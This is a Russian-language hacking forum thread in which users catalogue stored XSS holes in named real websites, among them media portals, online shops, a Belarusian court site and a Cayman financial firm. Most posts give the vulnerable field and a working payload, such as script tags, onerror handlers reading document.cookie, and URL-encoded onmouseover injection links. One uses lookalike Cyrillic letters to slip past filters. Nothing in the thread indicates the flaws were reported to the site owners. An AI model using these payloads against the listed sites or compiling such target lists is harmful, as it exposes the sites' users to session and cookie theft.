Хранимые XSS

Discussion in 'Уязвимости' started by +toxa+, 18 Mar 2007.

  1. maxim2142

    maxim2142 Member

    Joined:
    31 May 2010
    Messages:
    16
    Likes Received:
    10
    Reputations:
    3
    Kanobu.ru xss

    И так все наверно слышали это сайт ( kanobu.ru ) и xss скорее всего старая...но и была пассивка но ее прикрыли)
    и так уязвимые поля:
    Skype
    Twitter

    "><script>alert('XSS')</script>

    [​IMG]

    также можно выполнять html код
    пример:"><center><h1>ДА ДА ДА</h1></center>


    [​IMG]
     
    1 person likes this.
  2. Serrg

    Serrg Elder - Старейшина

    Joined:
    25 Dec 2011
    Messages:
    85
    Likes Received:
    15
    Reputations:
    13
    популярный сервис Спрашивай
    xss в поле имя при регистрации

    Code:
    "><script>alert(/xss/)</script>
    <script>alert('xss')</script>
    "><img src=aaa onerror=alert(document.cookie);>
     
    #462 Serrg, 28 Apr 2012
    Last edited: 8 Oct 2012
    2 people like this.
  3. Groove

    Groove Member

    Joined:
    13 Nov 2010
    Messages:
    183
    Likes Received:
    22
    Reputations:
    2
    http://212.ru/

    Регистрируемся , заходим в профиль ->Настройки->

    Уязвимые поля:


    Имя


    Пример


     
    1 person likes this.
  4. Fever

    Fever New Member

    Joined:
    4 Jun 2011
    Messages:
    7
    Likes Received:
    4
    Reputations:
    1
    интернет-магазин: gamepost.ua
    тИЦ: 10
    PR: 3

    Ни одно поле при регистрации не фильтруется.
    Уязвимо поле: Телефон

    [​IMG]
     
    1 person likes this.
  5. NetAng

    NetAng Member

    Joined:
    29 Dec 2010
    Messages:
    75
    Likes Received:
    12
    Reputations:
    5
    интернет магазин firstspring.ru
    В профиле уязвимы все поля кроме E-mail
    [​IMG]
     
  6. ChymeNik

    ChymeNik Member

    Joined:
    31 Aug 2010
    Messages:
    29
    Likes Received:
    7
    Reputations:
    9
    XSS rambler.ru:

    Логинимся на рамблере, http://foto.rambler.ru/photos/add/?album_id= загружаем фото
    Редактируем описание фото (действия с фото->редактировать) на:
    1'</script><script>alert("Chymenik - this is XSS! +1rep:)")</script>

    Пример: http://foto.rambler.ru/photos/5051d95d-5cdd-e5af-2988-b7f96b35aa7c/
     
    #466 ChymeNik, 13 Sep 2012
    Last edited: 13 Sep 2012
    3 people like this.
  7. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    mingorsud. gov.by

    Code:
    h_tp://mingorsud.gov.by/syst em/tmp ls/pages/pismo/fi z.p hp
    Уязвимое поле: post_address

    вставляем : " onmouseover=prompt(943147) bad="

    P.S.
    /system/tmpls/pages/pismo/ur.php

    Уязвимое поле: post_address
     
    #467 GhostW, 9 Jan 2013
    Last edited: 9 Jan 2013
    1 person likes this.
  8. dev1k

    dev1k Member

    Joined:
    25 Nov 2011
    Messages:
    0
    Likes Received:
    44
    Reputations:
    49
    http://xakep.ru/articles/map/default.asp


    [​IMG]


    Вставляем код в любом поле и нажимаем на Отправить и вы суперхакер.
     
    #468 dev1k, 14 Jan 2013
    Last edited: 14 Jan 2013
    1 person likes this.
  9. Groove

    Groove Member

    Joined:
    13 Nov 2010
    Messages:
    183
    Likes Received:
    22
    Reputations:
    2
    #469 Groove, 25 Feb 2013
    Last edited: 25 Feb 2013
    1 person likes this.
  10. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Приложите пример вставляемого скрипта пожалуйста.
     
    _________________________
  11. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    https://www.abacuscapital.ky

    Code:
    https://www.abacuscapital.ky/contact.asp?Email=CodeFail&EmailAddress=%27%20onmouseover%3dprompt%28958726%29%20bad%3d%27&MessageBody=1%3C%2ftextarea%3E1%3CScRiPt%20%3Eprompt%28978443%29%3C%2fScRiPt%3E
    а точнее, уязвимы поля EmailAddress и MessageBody

    Тож самое в: /process_form.asp

    уязвимы поля EmailAddress и MessageBody
     
  12. GrizliK91

    GrizliK91 New Member

    Joined:
    13 Nov 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    сайт клубной музыки bananastreet.ru

    ни одно поле не фильтруется в профиле

    код
    Code:
    <img src=f onerror=alert('XSSNAME') />
    пример
     
  13. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://www.promontorio.net/index.php?id=23&page=project&pageNum_rs_list=1&sub=%22onmouseover=prompt(997378)%20bad='%3E%3Cs%D1%81ri%D1%80t%3Ealert(/xss/)%3C/s%D1%81ri%D1%80t%3E%22
     
    1 person likes this.
  14. runge

    runge New Member

    Joined:
    3 Apr 2013
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Сайт _ttp://allforchildren.ru

    Уязвимое поле комментарии.

    Пример

    Сайт хороший, было бы жаль если админы не примут меры.
     
  15. danil7493

    danil7493 Member

    Joined:
    24 Jul 2011
    Messages:
    23
    Likes Received:
    7
    Reputations:
    10
    znanija.com

    Уязвимое поле "Комментарий профиля"

    скриншот
     
    2 people like this.
  16. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    www.eda-recepty.com

    Фотографии->Создать новый альбом->Название
    [​IMG]
     
    #476 OxoTnik, 23 Oct 2013
    Last edited: 23 Oct 2013
    2 people like this.
  17. t3cHn0iD

    t3cHn0iD Banned

    Joined:
    6 Apr 2009
    Messages:
    313
    Likes Received:
    63
    Reputations:
    66
    ogl.ru/project/users/login.php
    Уязвимое поле - Email
    [​IMG]
    ==========================
    twoystyle.ru
    Регаемся, вставляя во все поля наш скрипт, далее авторизовываемся на
    twoystyle.ru/login.asp, введя соответствующие данные и наблюдаем картину маслом
    [​IMG]
    ==========================
    mosgorfoto.com/users/auth.php
    Уязвимое поле - Эл.почта
    [​IMG]
     
    #477 t3cHn0iD, 29 Nov 2013
    Last edited: 30 Nov 2013
  18. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    [​IMG]

    В комментариях Уязвимое поле имя

    Code:
    http://www.f1cd.ru/soft/base/ultravpn/ultravpn_10/
     
    #478 WallHack, 20 Dec 2013
    Last edited: 20 Dec 2013
  19. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    http://chelreal.ru/

    Яндекс Тиц 1400
    Яндекс Каталог Да

    уязвимость в модуле комментарий

    Code:
    <script>alert('xss')</script>
    [​IMG]
     
  20. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    http://101@ru

    Яндекс тИЦ 1700
    Яндекс Каталог Да


    Уязвимое поле login
    (очень удобно)
    [​IMG]


    Чуток мотиваций
    Трафик
    [​IMG]